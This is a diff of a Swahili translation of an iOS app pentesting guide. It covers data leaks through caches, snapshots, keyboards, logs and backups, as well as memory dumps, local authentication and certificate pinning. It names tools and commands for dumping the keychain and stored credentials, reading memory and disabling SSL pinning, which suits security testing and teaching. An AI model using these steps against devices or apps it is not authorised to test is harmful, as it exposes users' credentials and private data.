`URLCache.shared.removeAllCachedResponses()`
Njia hii itafuta maombi na majibu yote yaliyohifadhiwa kutoka Cache.db file.
Njia hii itafuta maombi na majibu yote yaliyohifadhiwa kutoka faili ya Cache.db.
2. Ikiwa huhitaji kutumia faida ya cookies, inapendekezwa kutumia tu mali ya configuration ya [.ephemeral](https://developer.apple.com/documentation/foundation/urlsessionconfiguration/1410529-ephemeral) ya URLSession, ambayo itazima kuhifadhi cookies na Caches.
2. Ikiwa huhitaji kutumia faida ya vidakuzi, inapendekezwa kutumia tu mali ya usanidi ya [.ephemeral](https://developer.apple.com/documentation/foundation/urlsessionconfiguration/1410529-ephemeral) ya URLSession, ambayo itazima uhifadhi wa vidakuzi na Caches.
[Apple documentation](https://developer.apple.com/documentation/foundation/urlsessionconfiguration/1410529-ephemeral):
@ -528,13 +528,13 @@ Njia hii itafuta maombi na majibu yote yaliyohifadhiwa kutoka Cache.db file.
### Snapshots
Kila wakati unapobonyeza kitufe cha nyumbani, iOS **inachukua snapshot ya skrini ya sasa** ili iweze kufanya mpito kwenda kwenye programu kwa njia laini zaidi. Hata hivyo, ikiwa **data nyeti** **ipo** katika skrini ya sasa, itahifadhiwa katika **picha** (ambayo **inasalia** **katika** **reboots**). Hizi ni snapshots ambazo unaweza pia kufikia kwa kubonyeza mara mbili skrini ya nyumbani kubadilisha kati ya programu.
Kila wakati unapobonyeza kitufe cha nyumbani, iOS **huchukua picha ya skrini ya sasa** ili iweze kufanya mpito kwa programu kwa njia laini zaidi. Hata hivyo, ikiwa **data nyeti** ipo katika skrini ya sasa, itahifadhiwa katika **picha** (ambayo **inasalia** **katika** **reboots**). Hizi ni picha ambazo unaweza pia kufikia kwa kubonyeza mara mbili skrini ya nyumbani ili kubadilisha kati ya programu.
Ipasavyo iPhone haijavunjwa, **mshambuliaji** anahitaji kuwa na **ufikiaji** wa **kifaa** **kilichozuiwa** ili kuona picha hizi. Kwa default snapshot ya mwisho inahifadhiwa katika sandbox ya programu katika `Library/Caches/Snapshots/` au `Library/SplashBoard/Snapshots` folda (kompyuta zinazotegemewa haziwezi kufikia filesystem kutoka iOX 7.0).
Ipasavyo, ikiwa iPhone haijavunjwa, **mshambuliaji** anahitaji kuwa na **ufikiaji** wa **kifaa** **kilichozuiwa** ili kuona picha hizi. Kwa kawaida picha ya mwisho huhifadhiwa katika sandbox ya programu katika folda `Library/Caches/Snapshots/` au `Library/SplashBoard/Snapshots` (kompyuta zinazotegemewa haziwezi kufikia mfumo wa faili kutoka iOX 7.0).
Njia moja ya kuzuia tabia hii mbaya ni kuweka skrini tupu au kuondoa data nyeti kabla ya kuchukua snapshot kwa kutumia kazi `ApplicationDidEnterBackground()`.
Njia moja ya kuzuia tabia hii mbaya ni kuweka skrini tupu au kuondoa data nyeti kabla ya kuchukua picha kwa kutumia kazi ya `ApplicationDidEnterBackground()`.
Ifuatayo ni mfano wa njia ya kurekebisha ambayo itakagua screenshot ya default.
Ifuatayo ni mfano wa njia ya kurekebisha ambayo itaanzisha picha ya skrini ya kawaida.
Swift:
```swift
@ -566,7 +566,7 @@ self.backgroundImage.bounds = UIScreen.mainScreen.bounds;
[self.backgroundImage removeFromSuperview];
}
```
Hii inafanya picha ya nyuma kuwa `overlayImage.png` kila wakati programu inapokuwa katika hali ya nyuma. Inazuia uvujaji wa data nyeti kwa sababu `overlayImage.png` itakuwa daima inachukua nafasi ya mtazamo wa sasa.
Hii inafanya picha ya nyuma kuwa `overlayImage.png` kila wakati programu inapokuwa kwenye background. Inazuia uvujaji wa data nyeti kwa sababu `overlayImage.png` daima itachukua nafasi ya mtazamo wa sasa.
### Keychain
@ -574,7 +574,7 @@ Kwa kupata na kusimamia iOS keychain, zana kama [**Keychain-Dumper**](https://gi
#### **Kuhifadhi Akikumbukumbu**
Darasa la **NSURLCredential** ni bora kwa kuhifadhi taarifa nyeti moja kwa moja katika keychain, ikiepuka hitaji la NSUserDefaults au vifungashio vingine. Ili kuhifadhi akikumbukumbu baada ya kuingia, msimbo ufuatao wa Swift unatumika:
Darasa la **NSURLCredential** ni bora kwa kuhifadhi taarifa nyeti moja kwa moja kwenye keychain, ikiepuka hitaji la NSUserDefaults au vifungashio vingine. Ili kuhifadhi akikumbukumbu baada ya kuingia, kanuni ifuatayo ya Swift inatumika:
```swift
NSURLCredential *credential;
credential = [NSURLCredential credentialWithUser:username password:password persistence:NSURLCredentialPersistencePermanent];
@ -582,19 +582,19 @@ credential = [NSURLCredential credentialWithUser:username password:password pers
```
Ili kutoa hizi akiba za taarifa, amri ya Objection `ios nsurlcredentialstorage dump` inatumika.
## **Mikabala ya Kijadi na Kumbukumbu ya Kijadi**
## **Keyboards za Kawaida na Cache ya Keyboard**
Kuanzia iOS 8.0, watumiaji wanaweza kufunga nyongeza za kibodi za kijadi, ambazo zinaweza kudhibitiwa chini ya **Settings > General > Keyboard > Keyboards**. Ingawa hizi kibodi zinatoa kazi za ziada, zinabeba hatari ya kurekodi funguo na kuhamasisha data kwa seva za nje, ingawa watumiaji wanatolewa taarifa kuhusu kibodi zinazohitaji ufikiaji wa mtandao. Programu zinaweza, na zinapaswa, kuzuia matumizi ya kibodi za kijadi kwa ajili ya kuingiza taarifa nyeti.
Kuanzia iOS 8.0, watumiaji wanaweza kufunga nyongeza za keyboard za kawaida, ambazo zinaweza kudhibitiwa chini ya **Settings > General > Keyboard > Keyboards**. Ingawa keyboards hizi zinatoa kazi za ziada, zinabeba hatari ya kuandika funguo na kuhamasisha data kwa seva za nje, ingawa watumiaji wanatolewa taarifa kuhusu keyboards zinazohitaji ufikiaji wa mtandao. Programu zinaweza, na zinapaswa, kuzuia matumizi ya keyboards za kawaida kwa ajili ya kuingiza taarifa nyeti.
**Mapendekezo ya Usalama:**
- Inashauriwa kuzima kibodi za wahusika wengine kwa ajili ya kuongeza usalama.
- Kuwa makini na vipengele vya kurekebisha moja kwa moja na mapendekezo ya moja kwa moja ya kibodi ya iOS ya msingi, ambayo yanaweza kuhifadhi taarifa nyeti katika faili za kumbukumbu zilizoko katika `Library/Keyboard/{locale}-dynamic-text.dat` au `/private/var/mobile/Library/Keyboard/dynamic-text.dat`. Faili hizi za kumbukumbu zinapaswa kukaguliwa mara kwa mara kwa ajili ya data nyeti. Kurekebisha kamusi ya kibodi kupitia **Settings > General > Reset > Reset Keyboard Dictionary** inashauriwa ili kufuta data iliyohifadhiwa.
- Kukamata trafiki ya mtandao kunaweza kufichua ikiwa kibodi ya kijadi inahamisha funguo kwa mbali.
- Inashauriwa kuzima keyboards za wahusika wengine kwa ajili ya kuongeza usalama.
- Kuwa makini na vipengele vya autocorrect na auto-suggestions vya keyboard ya iOS ya kawaida, ambavyo vinaweza kuhifadhi taarifa nyeti katika faili za cache zilizoko katika `Library/Keyboard/{locale}-dynamic-text.dat` au `/private/var/mobile/Library/Keyboard/dynamic-text.dat`. Faili hizi za cache zinapaswa kukaguliwa mara kwa mara kwa ajili ya data nyeti. Kurekebisha kamusi ya keyboard kupitia **Settings > General > Reset > Reset Keyboard Dictionary** inashauriwa ili kufuta data za cache.
- Kukamata trafiki ya mtandao kunaweza kufichua ikiwa keyboard ya kawaida inahamisha funguo kwa mbali.
### **Kuzuia Kumbukumbu ya Sehemu za Maandishi**
### **Kuzuia Cache ya Uwanja wa Maandishi**
Protokali ya [UITextInputTraits](https://developer.apple.com/reference/uikit/uitextinputtraits) inatoa mali za kudhibiti kurekebisha moja kwa moja na kuingiza maandiko salama, muhimu kwa kuzuia kumbukumbu ya taarifa nyeti. Kwa mfano, kuzima kurekebisha moja kwa moja na kuwezesha kuingiza maandiko salama kunaweza kufikiwa kwa:
Protokali ya [UITextInputTraits](https://developer.apple.com/reference/uikit/uitextinputtraits) inatoa mali za kudhibiti autocorrection na kuingiza maandiko salama, muhimu kwa kuzuia cache ya taarifa nyeti. Kwa mfano, kuzima autocorrection na kuwezesha kuingiza maandiko salama kunaweza kufikiwa kwa:
```objectivec
textObject.autocorrectionType = UITextAutocorrectionTypeNo;
textObject.secureTextEntry = YES;
@ -608,11 +608,11 @@ textField.autocorrectionType = UITextAutocorrectionTypeNo;
Kusafisha msimbo mara nyingi kunahusisha matumizi ya **kuandika**. Kuna hatari inayohusiana kwani **maktaba zinaweza kuwa na taarifa nyeti**. Awali, katika iOS 6 na toleo la awali, maktaba zilikuwa zinapatikana kwa programu zote, zikileta hatari ya kuvuja kwa data nyeti. **Sasa, programu zimepunguzia upatikanaji wa maktaba zao pekee**.
Licha ya vizuizi hivi, **mshambuliaji mwenye ufikiaji wa kimwili** kwa kifaa kisichofungwa bado anaweza kutumia hii kwa kuunganisha kifaa kwenye kompyuta na **kusoma maktaba**. Ni muhimu kutambua kwamba maktaba zinabaki kwenye diski hata baada ya kufutwa kwa programu.
Licha ya vizuizi hivi, **mshambuliaji mwenye ufikiaji wa kimwili** kwa kifaa kisichofungwa anaweza bado kutumia hii kwa kuunganisha kifaa hicho kwenye kompyuta na **kusoma maktaba**. Ni muhimu kutambua kwamba maktaba zinabaki kwenye diski hata baada ya kufutwa kwa programu.
Ili kupunguza hatari, inashauriwa **kushirikiana kwa kina na programu**, kuchunguza kazi zake zote na ingizo ili kuhakikisha hakuna taarifa nyeti inayorekodiwa bila kukusudia.
Ili kupunguza hatari, inashauriwa **kushirikiana kwa kina na programu**, kuchunguza kazi zake zote na pembejeo kuhakikisha hakuna taarifa nyeti inayorekodiwa bila kukusudia.
Wakati wa kupitia msimbo wa chanzo wa programu kwa ajili ya kuvuja kwa uwezekano, angalia **kauli za kuandika** zilizowekwa na **za kawaida** kwa kutumia maneno muhimu kama `NSLog`, `NSAssert`, `NSCAssert`, `fprintf` kwa kazi zilizojengwa, na yoyote inayohusiana na `Logging` au `Logfile` kwa utekelezaji wa kawaida.
Wakati wa kupitia msimbo wa chanzo wa programu kwa uvujaji wa uwezekano, angalia **kauli za kuandika** zilizowekwa na **za kawaida** kwa kutumia maneno muhimu kama `NSLog`, `NSAssert`, `NSCAssert`, `fprintf` kwa kazi zilizojengwa, na yoyote inayohusiana na `Logging` au `Logfile` kwa utekelezaji wa kawaida.
### **Kufuatilia Maktaba za Mfumo**
@ -630,7 +630,7 @@ ni muhimu. Zaidi ya hayo, **Xcode** inatoa njia ya kukusanya kumbukumbu za conso
5. Chochea tatizo unalochunguza.
6. Tumia kitufe cha **Open Console** kuona kumbukumbu katika dirisha jipya.
Kwa ajili ya kumbukumbu za hali ya juu, kuunganisha kwenye shell ya kifaa na kutumia **socat** kunaweza kutoa ufuatiliaji wa kumbukumbu kwa wakati halisi:
Kwa kumbukumbu za hali ya juu, kuunganisha kwenye shell ya kifaa na kutumia **socat** kunaweza kutoa ufuatiliaji wa kumbukumbu kwa wakati halisi:
```bash
iPhone:~ root# socat - UNIX-CONNECT:/var/run/lockdown/syslog.sock
```
@ -642,17 +642,17 @@ Iliyofuatiwa na amri za kuangalia shughuli za log, ambazo zinaweza kuwa muhimu k
### Hatari za Usalama
Kuongezwa kwa **programu zilizowekwa na data zao** katika nakala za hifadhi kunaleta suala la **uvujaji wa data** na hatari kwamba **mabadiliko ya nakala za hifadhi yanaweza kubadilisha utendaji wa programu**. Inashauriwa **kutohifadhi taarifa nyeti katika maandiko wazi** ndani ya saraka ya programu yoyote au saraka zake ndogo ili kupunguza hatari hizi.
Kuongezwa kwa **programu zilizowekwa na data zao** katika nakala za hifadhi kunaleta suala la **uvujaji wa data** na hatari kwamba **mabadiliko ya nakala yanaweza kubadilisha utendaji wa programu**. Inashauriwa **kutohifadhi taarifa nyeti katika maandiko ya wazi** ndani ya saraka ya programu yoyote au saraka zake ndogo ili kupunguza hatari hizi.
### Kutengwa kwa Faili kutoka kwa Nakala za Hifadhi
Faili katika `Documents/` na `Library/Application Support/` zinahifadhiwa kwa default. Wataalamu wa programu wanaweza kutenga faili au saraka maalum kutoka kwa nakala za hifadhi kwa kutumia `NSURL setResourceValue:forKey:error:` na `NSURLIsExcludedFromBackupKey`. Praktiki hii ni muhimu kwa kulinda data nyeti isijumuishwe katika nakala za hifadhi.
### Kupima Uthibitisho wa Usalama
### Kupima Uhalifu
Ili kutathmini usalama wa nakala za hifadhi za programu, anza kwa **kuunda nakala ya hifadhi** kwa kutumia Finder, kisha ipate kwa kufuata mwongozo kutoka [nyaraka rasmi za Apple](https://support.apple.com/en-us/HT204215). Changanua nakala ya hifadhi kwa data nyeti au mipangilio ambayo inaweza kubadilishwa ili kuathiri tabia ya programu.
Ili kutathmini usalama wa nakala za programu, anza kwa **kuunda nakala** kwa kutumia Finder, kisha ipate kwa kufuata mwongozo kutoka [nyaraka rasmi za Apple](https://support.apple.com/en-us/HT204215). Changanua nakala hiyo kwa data nyeti au mipangilio ambayo inaweza kubadilishwa ili kuathiri tabia ya programu.
Taarifa nyeti zinaweza kutafutwa kwa kutumia zana za mistari ya amri au programu kama [iMazing](https://imazing.com). Kwa nakala za hifadhi zilizofichwa, uwepo wa usimbaji unaweza kuthibitishwa kwa kuangalia ufunguo wa "IsEncrypted" katika faili ya "Manifest.plist" kwenye mzizi wa nakala ya hifadhi.
Taarifa nyeti zinaweza kutafutwa kwa kutumia zana za mistari ya amri au programu kama [iMazing](https://imazing.com). Kwa nakala zilizofichwa, uwepo wa usimbaji unaweza kuthibitishwa kwa kuangalia ufunguo wa "IsEncrypted" katika faili ya "Manifest.plist" kwenye mzizi wa nakala.
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
@ -673,11 +673,11 @@ Mfano wa kubadilisha tabia ya programu kupitia marekebisho ya nakala umeonyeshwa
## Muhtasari juu ya Upimaji wa Kumbukumbu kwa Taarifa Nyeti
Wakati wa kushughulikia taarifa nyeti zilizohifadhiwa katika kumbukumbu ya programu, ni muhimu kupunguza muda wa kufichua taarifa hizi. Kuna mbinu mbili kuu za kuchunguza maudhui ya kumbukumbu: **kuunda dump ya kumbukumbu** na **kuchambua kumbukumbu kwa wakati halisi**. Mbinu zote zina changamoto zao, ikiwa ni pamoja na uwezekano wa kukosa taarifa muhimu wakati wa mchakato wa dump au uchambuzi.
Wakati wa kushughulikia taarifa nyeti zilizohifadhiwa katika kumbukumbu ya programu, ni muhimu kupunguza muda wa kufichuliwa kwa data hii. Kuna mbinu mbili kuu za kuchunguza maudhui ya kumbukumbu: **kuunda dump ya kumbukumbu** na **kuchambua kumbukumbu kwa wakati halisi**. Mbinu zote zina changamoto zao, ikiwa ni pamoja na uwezekano wa kukosa data muhimu wakati wa mchakato wa dump au uchambuzi.
## **Kurejesha na Kuchambua Dump ya Kumbukumbu**
Kwa vifaa vyote vilivyovunjwa na visivyovunjwa, zana kama [objection](https://github.com/sensepost/objection) na [Fridump](https://github.com/Nightbringer21/fridump) zinaruhusu dumping ya kumbukumbu ya mchakato wa programu. Mara baada ya dumping, kuchambua data hii kunahitaji zana mbalimbali, kulingana na asili ya taarifa unazotafuta.
Kwa vifaa vyote vilivyovunjwa na visivyovunjwa, zana kama [objection](https://github.com/sensepost/objection) na [Fridump](https://github.com/Nightbringer21/fridump) zinaruhusu dumping ya kumbukumbu ya mchakato wa programu. Mara baada ya dumping, kuchambua data hii kunahitaji zana mbalimbali, kulingana na asili ya taarifa unayotafuta.
Ili kutoa nyuzi kutoka kwa dump ya kumbukumbu, amri kama `strings` au `rabin2 -zz` zinaweza kutumika:
```bash
@ -704,27 +704,27 @@ $ r2 frida://usb//<name_of_your_app>
### Mchakato Mbaya wa Usimamizi wa Funguo
Wakandarasi wengine huhifadhi data nyeti katika hifadhi ya ndani na kuificha kwa funguo zilizowekwa kwa nguvu/kupangwa katika msimbo. Hii haipaswi kufanywa kwani baadhi ya kurudi nyuma kunaweza kuruhusu washambuliaji kutoa taarifa za siri.
Wakandarasi wengine huhifadhi data nyeti katika hifadhi ya ndani na kuificha kwa funguo zilizowekwa kwa nguvu/kutabirika katika msimbo. Hii haipaswi kufanywa kwani baadhi ya kurudi nyuma kunaweza kuruhusu washambuliaji kutoa taarifa za siri.
### Matumizi ya Algorithimu zisizo Salama na/au Zilizopitwa na Wakati
Wakandarasi hawapaswi kutumia **algorithimu zilizopitwa na wakati** kufanya **ukaguzi** wa mamlaka, **hifadhi** au **kutuma** data. Baadhi ya algorithimu hizi ni: RC4, MD4, MD5, SHA1... Ikiwa **hashes** zinatumika kuhifadhi nywila kwa mfano, hashes zinazopinga **brute-force** zinapaswa kutumika pamoja na chumvi.
### Angalizo
### Kagua
Ukaguzi mkuu wa kufanya ni kutafuta ikiwa unaweza kupata **nywila**/siri zilizowekwa kwa nguvu katika msimbo, au ikiwa hizo ni **zinazoweza kutabiriwa**, na ikiwa msimbo unatumia aina fulani ya algorithimu za **kificho** **dhaifu**.
Ukaguzi mkuu wa kufanya ni kutafuta ikiwa unaweza kupata **nywila**/siri zilizowekwa kwa nguvu katika msimbo, au ikiwa hizo ni **kutabirika**, na ikiwa msimbo unatumia aina fulani ya algorithimu za **kificho** **dhaifu**.
Ni ya kuvutia kujua kwamba unaweza **kufuatilia** baadhi ya **maktaba** za **crypto** kiotomatiki ukitumia **objection** na:
```swift
ios monitor crypt
```
Kwa **maelezo zaidi** kuhusu APIs na maktaba za usimbuaji za iOS tembelea [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06e-testing-cryptography](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06e-testing-cryptography)
Kwa **maelezo zaidi** kuhusu iOS cryptographic APIs na maktaba, tembelea [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06e-testing-cryptography](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06e-testing-cryptography)
## Uthibitishaji wa Mitaa
**Uthibitishaji wa mitaa** una jukumu muhimu, hasa linapokuja suala la kulinda ufikiaji katika mwisho wa mbali kupitia mbinu za usimbuaji. Kiini hapa ni kwamba bila utekelezaji sahihi, mitambo ya uthibitishaji wa mitaa inaweza kupuuziliwa mbali.
**Uthibitishaji wa mitaa** una jukumu muhimu, hasa linapokuja suala la kulinda ufikiaji katika mwisho wa mbali kupitia mbinu za kijasusi. Kiini hapa ni kwamba bila utekelezaji sahihi, mifumo ya uthibitishaji wa mitaa inaweza kupuuziliwa mbali.
[**Msingi wa Uthibitishaji wa Mitaa**](https://developer.apple.com/documentation/localauthentication) wa Apple na [**keychain**](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html) zinatoa APIs thabiti kwa waendelezaji kuwezesha mazungumzo ya uthibitishaji wa mtumiaji na kushughulikia data za siri kwa usalama, mtawalia. Enclave Salama inalinda kitambulisho cha alama ya kidole kwa Touch ID, wakati Face ID inategemea utambuzi wa uso bila kuathiri data za kibaiolojia.
[**Msingi wa Uthibitishaji wa Mitaa**](https://developer.apple.com/documentation/localauthentication) wa Apple na [**keychain**](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html) zinatoa APIs thabiti kwa waendelezaji kuwezesha mazungumzo ya uthibitishaji wa mtumiaji na kushughulikia data ya siri kwa usalama, mtawalia. Secure Enclave inalinda fingerprint ID kwa Touch ID, wakati Face ID inategemea utambuzi wa uso bila kuathiri data za kibaiolojia.
Ili kuunganisha Touch ID/Face ID, waendelezaji wana chaguo mbili za API:
@ -732,14 +732,14 @@ Ili kuunganisha Touch ID/Face ID, waendelezaji wana chaguo mbili za API:
- **`Security.framework`** kwa ufikiaji wa huduma za keychain za kiwango cha chini, ikilinda data za siri kwa uthibitishaji wa kibaiolojia. Mifumo mbalimbali ya [open-source wrappers](https://www.raywenderlich.com/147308/secure-ios-user-data-keychain-touch-id) inafanya ufikiaji wa keychain kuwa rahisi.
> [!CAUTION]
> Hata hivyo, `LocalAuthentication.framework` na `Security.framework` zinaonyesha udhaifu, kwani kwa msingi hurudisha thamani za boolean bila kuhamasisha data kwa michakato ya uthibitishaji, na kuifanya kuwa rahisi kupuuziliwa mbali (tazama [Don't touch me that way, by David Lindner et al](https://www.youtube.com/watch?v=XhXIHVGCFFM)).
> Hata hivyo, `LocalAuthentication.framework` na `Security.framework` zinaonyesha udhaifu, kwani kwa msingi hurudisha thamani za boolean bila kuhamasisha data kwa michakato ya uthibitishaji, na kuifanya iwe rahisi kupuuzilia mbali (tazama [Don't touch me that way, by David Lindner et al](https://www.youtube.com/watch?v=XhXIHVGCFFM)).
### Kutekeleza Uthibitishaji wa Mitaa
Ili kuhamasisha watumiaji kwa uthibitishaji, waendelezaji wanapaswa kutumia **`evaluatePolicy`** njia ndani ya **`LAContext`** darasa, wakichagua kati ya:
- **`deviceOwnerAuthentication`**: Inahamasishe kwa Touch ID au nambari ya kifaa, ikishindwa ikiwa zote mbili hazijawashwa.
- **`deviceOwnerAuthenticationWithBiometrics`**: Inahamasishe pekee kwa Touch ID.
- **`deviceOwnerAuthentication`**: Inahamasisha kwa Touch ID au nambari ya kifaa, ikishindwa ikiwa zote mbili hazijawashwa.
- **`deviceOwnerAuthenticationWithBiometrics`**: Inahamasisha pekee kwa Touch ID.
Uthibitishaji uliofanikiwa unadhihirishwa na thamani ya boolean inayorejea kutoka **`evaluatePolicy`**, ikionyesha kasoro inayoweza kutokea ya usalama.
@ -749,7 +749,7 @@ Kutekeleza **uthibitishaji wa mitaa** katika programu za iOS kunahusisha matumiz
Keychain inatoa uwezo wa kuweka vitu na sifa ya `SecAccessControl`, ambayo inazuia ufikiaji wa kipengee hadi mtumiaji athibitishwe kwa mafanikio kupitia Touch ID au nambari ya kifaa. Kipengele hiki ni muhimu kwa kuboresha usalama.
Hapa chini kuna mifano ya msimbo katika Swift na Objective-C inayoonyesha jinsi ya kuhifadhi na kupata mfuatano kutoka/kwenda kwenye keychain, ikitumia vipengele hivi vya usalama. Mifano inaonyesha hasa jinsi ya kuweka udhibiti wa ufikiaji ili kuhitaji uthibitishaji wa Touch ID na kuhakikisha kuwa data inapatikana tu kwenye kifaa ambacho ilipangwa, chini ya hali kwamba nambari ya kifaa imewekwa.
Hapa chini kuna mifano ya msimbo katika Swift na Objective-C ikionyesha jinsi ya kuhifadhi na kupata string kutoka kwa keychain, ikitumia vipengele hivi vya usalama. Mifano inaonyesha hasa jinsi ya kuweka udhibiti wa ufikiaji ili kuhitaji uthibitishaji wa Touch ID na kuhakikisha kuwa data inapatikana tu kwenye kifaa ambacho ilipangwa, chini ya hali kwamba nambari ya kifaa imewekwa.
{{#tabs}}
{{#tab name="Swift"}}
@ -876,7 +876,7 @@ NSLog(@"Something went wrong");
### Ugunduzi
Matumizi ya mifumo katika programu yanaweza pia kugundulika kwa kuchambua orodha ya maktaba za pamoja za dinamik katika binary ya programu. Hii inaweza kufanywa kwa kutumia `otool`:
Matumizi ya mifumo katika programu yanaweza pia kugundulika kwa kuchambua orodha ya maktaba za dinamik zinazoshirikiwa za programu. Hii inaweza kufanywa kwa kutumia `otool`:
```bash
$ otool -L <AppName>.app/<AppName>
```
@ -1000,7 +1000,7 @@ ios-app-extensions.md
ios-webviews.md
{{#endref}}
### Serialisation na Encoding
### Usawazishaji na Uandishi
{{#ref}}
ios-serialisation-and-encoding.md
@ -1008,7 +1008,7 @@ ios-serialisation-and-encoding.md
## Mawasiliano ya Mtandao
Ni muhimu kuangalia kwamba hakuna mawasiliano yanayotokea **bila usimbuaji** na pia kwamba programu inathibitisha kwa usahihi **cheti cha TLS** cha seva.\
Ni muhimu kuangalia kwamba hakuna mawasiliano yanayotokea **bila usimbaji** na pia kwamba programu inathibitisha kwa usahihi **cheti cha TLS** cha seva.\
Ili kuangalia masuala haya unaweza kutumia proxy kama **Burp**:
{{#ref}}
@ -1020,7 +1020,7 @@ burp-configuration-for-ios.md
Tatizo moja la kawaida katika kuthibitisha cheti cha TLS ni kuangalia kwamba cheti kimeandikwa na **CA** **iliyoaminika**, lakini **sio kuangalia** kama **jina la kikoa** la cheti ndilo jina la kikoa linalofikiwa.\
Ili kuangalia tatizo hili kwa kutumia Burp, baada ya kuamini Burp CA kwenye iPhone, unaweza **kuunda cheti kipya na Burp kwa jina la kikoa tofauti** na kukitumia. Ikiwa programu bado inafanya kazi, basi, kuna kitu kinahatarisha.
### Kuweka Cheti
### Ufunguo wa Cheti
Ikiwa programu inatumia SSL Pinning kwa usahihi, basi programu itafanya kazi tu ikiwa cheti ni kile kinachotarajiwa. Wakati wa kujaribu programu **hii inaweza kuwa tatizo kwani Burp itatoa cheti yake mwenyewe.**\
Ili kupita ulinzi huu ndani ya kifaa kilichovunjwa, unaweza kufunga programu [**SSL Kill Switch**](https://github.com/nabla-c0d3/ssl-kill-switch2) au kufunga [**Burp Mobile Assistant**](https://portswigger.net/burp/documentation/desktop/mobile/config-ios-device)
@ -1042,17 +1042,17 @@ Unaweza pia kutumia **objection's** `ios sslpinning disable`
Wakuu wa programu wanaweza kwa mbali **kurekebisha usakinishaji wote wa programu yao mara moja** bila ya kuwasilisha tena programu hiyo kwenye Duka la Programu na kusubiri hadi idhini ipatikane.\
Kwa kusudi hili mara nyingi hutumia [**JSPatch**](https://github.com/bang590/JSPatch)**.** Lakini kuna chaguzi nyingine pia kama [Siren](https://github.com/ArtSabintsev/Siren) na [react-native-appstore-version-checker](https://www.npmjs.com/package/react-native-appstore-version-checker).\
**Huu ni mfumo hatari ambao unaweza kutumiwa vibaya na SDK za wahusika wengine mbaya, kwa hivyo inashauriwa kuangalia ni njia gani inatumika kwa sasisho za kiotomatiki (ikiwa zipo) na kujaribu.** Unaweza kujaribu kupakua toleo la awali la programu kwa kusudi hili.
**Hii ni mbinu hatari ambayo inaweza kutumika vibaya na SDK za wahusika wengine, kwa hivyo inashauriwa kuangalia ni mbinu gani inayotumika kwa sasisho za kiotomatiki (ikiwa zipo) na kujaribu.** Unaweza kujaribu kupakua toleo la awali la programu kwa kusudi hili.
### Wahusika Wengine
Changamoto kubwa na **SDK za wahusika wengine** ni **ukosefu wa udhibiti wa kina** juu ya kazi zao. Wakuu wa programu wanakabiliwa na chaguo: ama kuunganisha SDK na kukubali vipengele vyake vyote, ikiwa ni pamoja na hatari za usalama na wasiwasi wa faragha, au kuacha faida zake kabisa. Mara nyingi, wakuu wa programu hawawezi kurekebisha hatari ndani ya SDK hizi wenyewe. Zaidi ya hayo, kadri SDK zinavyopata imani ndani ya jamii, zingine zinaweza kuanza kuwa na malware.
Changamoto kubwa na **SDK za wahusika wengine** ni **ukosefu wa udhibiti wa kina** juu ya kazi zao. Wakuu wa programu wanakabiliwa na chaguo: ama kuunganisha SDK na kukubali vipengele vyake vyote, ikiwa ni pamoja na hatari za usalama na wasiwasi wa faragha, au kuacha faida zake kabisa. Mara nyingi, wakuu wa programu hawawezi kurekebisha hatari ndani ya SDK hizi wenyewe. Zaidi ya hayo, kadri SDK zinavyopata uaminifu ndani ya jamii, baadhi zinaweza kuanza kuwa na malware.
Huduma zinazotolewa na SDK za wahusika wengine zinaweza kujumuisha ufuatiliaji wa tabia za mtumiaji, kuonyesha matangazo, au kuboresha uzoefu wa mtumiaji. Hata hivyo, hii inaingiza hatari kwani wakuu wa programu wanaweza kutokuwa na ufahamu kamili wa msimbo unaotekelezwa na maktaba hizi, na kusababisha hatari za faragha na usalama. Ni muhimu kupunguza taarifa zinazoshirikiwa na huduma za wahusika wengine kwa kile kinachohitajika na kuhakikisha kwamba hakuna data nyeti inayofichuliwa.
Huduma zinazotolewa na SDK za wahusika wengine zinaweza kujumuisha ufuatiliaji wa tabia za mtumiaji, kuonyesha matangazo, au kuboresha uzoefu wa mtumiaji. Hata hivyo, hii inaleta hatari kwani wakuu wa programu wanaweza kutokuwa na ufahamu kamili wa msimbo unaotekelezwa na maktaba hizi, na kusababisha hatari za faragha na usalama. Ni muhimu kupunguza taarifa zinazoshirikiwa na huduma za wahusika wengine hadi zile zinazohitajika na kuhakikisha kwamba hakuna data nyeti inayofichuliwa.
Utekelezaji wa huduma za wahusika wengine kawaida huja katika aina mbili: maktaba huru au SDK kamili. Ili kulinda faragha ya mtumiaji, data yoyote inayoshirikiwa na huduma hizi inapaswa kuwa **isiyojulikana** ili kuzuia kufichuliwa kwa Taarifa za Kibinafsi (PII).
Ili kubaini maktaba ambazo programu inatumia, amri ya **`otool`** inaweza kutumika. Chombo hiki kinapaswa kukimbizwa dhidi ya programu na kila maktaba iliyoshirikiwa inayotumia ili kugundua maktaba za ziada.
Ili kubaini maktaba ambazo programu inatumia, amri ya **`otool`** inaweza kutumika. Chombo hiki kinapaswa kukimbizwa dhidi ya programu na kila maktaba iliyoshirikiwa inayotumiwa kugundua maktaba za ziada.
```bash
otool -L <application_path>
```

40
src/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md
View File

@ -6,7 +6,7 @@
### **Kutambua UDID ya Kifaa cha iOS**
Ili kutambua kifaa cha iOS kwa kipekee, mfuatano wa tarakimu 40 unaojulikana kama UDID unatumika. Kwenye macOS Catalina au mpya, hii inaweza kupatikana katika **Finder app**, kwani iTunes haitumiki tena. Kifaa, kinapounganishwa kupitia USB na kuchaguliwa katika Finder, kinaonyesha UDID yake pamoja na taarifa nyingine wakati maelezo chini ya jina lake yanapobofya.
Ili kutambua kifaa cha iOS kwa kipekee, mfuatano wa tarakimu 40 unaojulikana kama UDID unatumika. Kwenye macOS Catalina au mpya, hii inaweza kupatikana katika **Finder app**, kwani iTunes haipo tena. Kifaa, kinapounganishwa kupitia USB na kuchaguliwa katika Finder, kinaonyesha UDID yake pamoja na taarifa nyingine wakati maelezo chini ya jina lake yanapobofya.
